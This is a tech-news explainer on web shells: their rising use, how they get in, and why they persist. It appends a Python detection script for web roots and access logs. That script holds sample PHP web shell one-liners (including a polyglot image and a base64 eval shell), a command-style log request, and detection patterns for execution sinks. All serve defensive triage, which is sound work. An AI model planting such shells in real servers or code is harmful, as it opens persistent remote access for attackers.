Top 5 things to know about web shells - TechRepublic


The use of web shells is increasing, which could put your business at risk. Tom Merritt lists five things to know about web shells.

Written by Tom Merritt
May 10, 2021

Recently, the U.S. FBI was given court authorization to delete web shells from Microsoft Exchange servers. Web shells are a rising menace. They let attackers hide an entry point in your network that’s hard to get rid of. You don’t generally let the FBI go scanning for web shells if it’s an easy fix. Why all the angst? Here are five things to know about web shells.


  1. Their use is accelerating. According to Microsoft, from August 2020 to January 2021 it saw an average of 144,000 web shells, almost double the figure for the same period in 2019 to 2020.
  2. You can write one in almost any web programming language. Web shells are written in PHP, JSP and ASP, among others. They are easy to slip in wherever a web app or internet-facing server has a vulnerability, and attackers find such servers with vulnerability scanners or a Shodan search. One example was an image file with server-side code embedded in it: when a web client requested the image, the server executed the code and installed the shell.
  3. Web shells are easy to use once they are installed. The command interface is instantly usable from any browser, even on a phone.
  4. They let an attacker do what a legitimate administrator can do, with the privileges of the account the web server runs as (which the attacker then tries to escalate). A web shell can run commands and execute code, from dropping cryptominers or other malware to collecting system information that enables lateral movement within the network.
  5. They are hard to detect. Because their traffic is ordinary HTTP, commands and results hide easily inside what looks like normal exchanges with the website. Patching the vulnerability that let the shell in does not remove the shell itself. If you do not find and delete it, it remains as a persistent backdoor into your network.

How do you stop web shells? All the usual methods apply. Firewalls, log audits, credential hygiene, network segmentation and patch, patch, patch. The U.S. NSA offers tools for detection and removal on Github as well.
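The log audits and the image-with-code case in item 2 above are easier to picture with code. The Python below is an added example written for this page, not the article's own material and not the NSA's tooling. It runs two cheap heuristics a responder would apply while waiting for a proper scanner: a content check over files under a web root (PHP tags inside image files, and code-execution sinks fed straight from request parameters) and an access-log check for URIs that look like a shell being operated (command-like query parameters, POSTs to image files, and pages that nobody links to and only a couple of client IPs ever touch). The file paths, file contents and log lines are constructed sample data, and the `/uploads/` directory is an assumption.

```python
"""Heuristic web-shell triage over a web root and an access log.
Added example with constructed sample data; not the NSA detection tooling."""
import re
from collections import defaultdict

# PHP functions that turn data into code or commands, and the request
# superglobals an operator feeds them from. Both in one file is a strong signal.
SINK_RE = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")
B64_RE = re.compile(r"\bbase64_decode\s*\(", re.I)
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.I)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".ico", ".svg")
SUSPECT_PARAMS = {"cmd", "command", "exec", "shell", "code"}

# Constructed web-root contents, as bytes read from disk.
SAMPLE_FILES = {
    "/var/www/html/index.php": b"<?php\necho 'Hello';\n",
    "/var/www/html/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    # A polyglot "image": a JPEG header followed by PHP, the case from item 2.
    "/var/www/html/uploads/avatar.jpg":
        b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"<?php system($_GET['c']); ?>",
    # A classic one-liner shell that evals base64-encoded PHP sent over POST.
    "/var/www/html/uploads/.cache.php": b"<?php @eval(base64_decode($_POST['x'])); ?>",
}

# Constructed combined-format access log lines (Apache/nginx style).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2021:10:01:22 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/May/2021:10:01:30 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/May/2021:10:01:40 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2021:10:02:01 +0000] "GET /about.php HTTP/1.1" 200 2210 "http://example.test/index.php" "Mozilla/5.0"',
    '192.0.2.9 - - [10/May/2021:10:02:11 +0000] "GET /about.php HTTP/1.1" 200 2210 "http://example.test/index.php" "Mozilla/5.0"',
    '198.51.100.77 - - [10/May/2021:03:12:05 +0000] "POST /uploads/avatar.jpg HTTP/1.1" 200 88 "-" "python-requests/2.25"',
    '198.51.100.77 - - [10/May/2021:03:12:09 +0000] "GET /uploads/.cache.php?cmd=whoami HTTP/1.1" 200 31 "-" "python-requests/2.25"',
]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<qs>[^ "]*))? [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')


def scan_file(path, data):
    """Return the reasons a file looks like a web shell (empty list if clean)."""
    findings = []
    text = data.decode("latin-1")  # never fails; the regexes only need ASCII
    has_tag = bool(PHP_TAG_RE.search(data))
    if has_tag and path.lower().endswith(IMAGE_EXT):
        findings.append("php-code-in-image")
    if has_tag and SINK_RE.search(text) and SOURCE_RE.search(text):
        findings.append("request-controlled-sink")
    if has_tag and B64_RE.search(text) and SINK_RE.search(text):
        findings.append("encoded-payload-sink")
    return findings


def scan_web_root(files):
    """files: {path: bytes}. Returns {path: reasons} for suspicious files only."""
    out = {}
    for path, data in files.items():
        reasons = scan_file(path, data)
        if reasons:
            out[path] = reasons
    return out


def scan_log(lines, max_clients=2):
    """Flag URIs whose traffic looks like a shell being operated."""
    per_path = defaultdict(lambda: {"ips": set(), "referred": False, "posts": 0, "params": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        rec = per_path[m["path"]]
        rec["ips"].add(m["ip"])
        rec["referred"] = rec["referred"] or m["ref"] not in ("", "-")
        rec["posts"] += m["method"] == "POST"
        if m["qs"]:
            rec["params"].update(p.partition("=")[0].lower() for p in m["qs"].split("&"))
    flagged = {}
    for path, rec in per_path.items():
        reasons = []
        if rec["params"] & SUSPECT_PARAMS:
            reasons.append("command-like-parameter")
        # Real pages are linked from somewhere and hit by many clients; a shell is neither.
        if len(rec["ips"]) <= max_clients and not rec["referred"] and (rec["posts"] or path.lower().endswith(".php")):
            reasons.append("unlinked-low-fanout")
        if rec["posts"] and path.lower().endswith(IMAGE_EXT):
            reasons.append("post-to-image")
        if reasons:
            flagged[path] = reasons
    return flagged


if __name__ == "__main__":
    for path, reasons in scan_web_root(SAMPLE_FILES).items():
        print("FILE", path, ",".join(reasons))
    for path, reasons in scan_log(SAMPLE_LOG).items():
        print("URI ", path, ",".join(reasons))
```

On the sample data, both uploaded files and both shell URIs are flagged while `index.php` and `about.php` are not; raising `max_clients` to 3 would also flag `index.php`, which is the usual trade-off with fan-out thresholds on a small site. These heuristics are a first pass only: an attacker can rename parameters, add a fake Referer header or hide the sink behind string concatenation, which is why the article's advice to pair log audits with patching, segmentation and the NSA's signature-based tooling still stands.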



Tom Merritt

Tom is an award-winning independent tech podcaster and host of regular tech news and information shows. Tom hosts Sword and Laser, a science fiction and fantasy podcast, and book club with Veronica Belmont. He also hosts Daily Tech News Show, covering the most important tech issues of the day with the smartest minds in technology.